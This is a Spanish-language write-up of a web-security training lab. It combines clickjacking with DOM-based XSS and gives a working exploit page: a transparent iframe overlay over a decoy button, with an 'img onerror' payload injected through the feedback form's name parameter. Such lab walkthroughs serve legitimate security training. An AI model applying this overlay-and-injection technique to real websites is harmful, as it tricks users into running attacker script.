Descripción
This lab contains an XSS vulnerability that is triggered by a click. Construct a clickjacking attack that fools the user into clicking the «Click me» button to call the print() function.
Exploiting clickjacking vulnerability to trigger DOM-based XSS writeup
En este laboratorio, tendremos una página donde podremos enviar un comentario (‘Submit feedback’). Al hacerlo, la página mostrará nuestro nombre como contenido HTML:
Si cambiamos nuestro nombre por ‘<img src=1 onerror=alert(«Hola»)> vemos que es vulnerable a un XSS:
Con lo cual, resolveremos este laboratorio de la misma manera que el anterior (Clickjacking with form input data prefilled from a URL parameter):
<style>
iframe {
position:relative;
width:1500px;
height:680px;
opacity: 0.5;
z-index: 9999;
}
div {
position:absolute;
top: 600px;
left: 230px;
z-index: 99;
}
</style>
<div>Click me</div>
<iframe src="https://0ad400050344a0d781cc4e3c005100bc.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=test@cyberhub.es&subject=asaunto&message=mensaje#feedbackResult"></iframe>Nota: Hay que cambiar la fuente del ‘iframe’ (etiqueta ‘src’ por el enlace de la página de ‘Submit feedback’ donde se encuentra la vulnerabilidad XSS).
Se ha añadido ‘#feedbackResult’ para que la página muestre el botón en pantalla directamente, sin tener que hacer scroll:
Al pulsar ‘Deliver exploit to victim’ completaremos el laboratorio:
